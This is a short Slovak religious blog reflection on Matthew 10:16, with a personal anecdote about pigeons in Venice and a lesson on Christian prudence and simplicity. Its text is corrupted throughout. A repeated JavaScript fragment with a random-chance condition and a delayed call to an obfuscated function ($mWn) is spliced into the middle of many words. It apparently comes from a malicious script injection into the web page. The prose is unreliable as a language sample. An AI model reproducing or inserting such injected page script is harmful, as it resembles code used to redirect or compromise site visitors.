Slovo

„Buďte teda opatrní ako hady a jednoduchí ako holubice.“

18. júna 2017 | Martin Mati

Prečítané: 3557x

Mt 10, 16 – 20
Hľa, posielam vás ako ovce medzi vlkov. Buďte teda opatrní ako hady a jednoduchí ako holubice. Chráňte sa ľudí; lebo vás vydajú súdom, budú vás bičovať vo svojich synagógach a pre mňa vás budú vláčiť pred vladárov a kráľov, aby ste vydali svedectvo im aj pohanom. Ale keď vás vydajú, nestarajte sa, ako a čo budete hovoriť, lebo v tú hodinu vám bude dané, čo máte povedať. Veď dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to už nie vy budete hovoriť; ale Duch vášho Otca bude hovoriť vo vás.

Keď som bol v roku 1990 prvýkrát v Benátkach, zažil som tam nemilú skúsenosť s holubom, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torú možno máte aj vy. Pri prehliadke pamiadom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok som v jednom okamihu mal pocit, akoby ma niekdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tľapol po chrbte. Vzhľadom na množstvo holubov mi hneď napadlo, čo by dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to mohlo byť. Predtucha neklamala… Pri pohľade na bundu, som si spomenul na myšlienku, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torá vraj pochádza od sv. Františka z Assisi: „Bože, ďakujem Ti, že si nedal kravám krídla!”
Keď som si prečítal prirovnanie z evanjelia, „Buďte opatrní ako hady a jednoduchí ako holubice.”, napadlo mi, že zaujímavé zvieratá a vlastnosti Ježiš predkladá ako spôsob kresťanského života.
Ježiš časdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to používal obrazy blízke skúsenosti človeka, len ide o dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, nakoľko sa my dokážeme s dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toudom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Ježišovou výzvou sdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tožniť a prijať ju.
Keď Ježiš hovorí o opatrnosti, nemyslí na chytrosť ako čo najviac urvať od života, ale na život žitý dole na zemi, keď je nutné dávať pozor, aby diabol človeka nezašliapal. Na dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je však potrebná jednoduchosť holuba, aby sme si uvedomovali, bez čoho všetkého je možné žiť šťastný život. V každom inom prípade sa prejavia práve tie druhé vlastnosti, že ako kresťania sme otravní ako holuby a jedovatí ako hady.
Kresťanstvo má čo ponúknuť dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomudom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to svetu, ale musí sa žiť podľa evanjelia.

-mm-